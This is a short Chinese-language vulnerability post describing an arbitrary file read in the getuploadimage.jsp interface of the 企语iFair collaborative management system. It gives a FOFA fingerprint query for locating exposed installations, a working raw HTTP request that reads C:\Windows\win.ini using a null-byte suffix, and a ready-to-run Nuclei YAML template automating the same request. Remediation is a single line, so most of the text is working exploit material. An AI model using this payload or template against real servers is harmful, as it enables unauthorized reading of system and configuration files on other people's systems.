文章目录
- 免责申明
- 漏洞描述
- 搜索语法
- 漏洞复现
- yaml
- 修复建议
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,可以读取系统文件配置
搜索语法
fofa
app="服务社-企语iFair"
漏洞复现
payload
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
yaml
id: template-id
info:
name: Template Name
author: 'xl'
severity: info
description: description
reference:
- https://
tags: tags
http:
- raw:
- |+
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
matchers-condition: and
matchers:
- type: word
part: body
words:
- extensions
- type: status
status:
- 200
修复建议
更新到最新版本
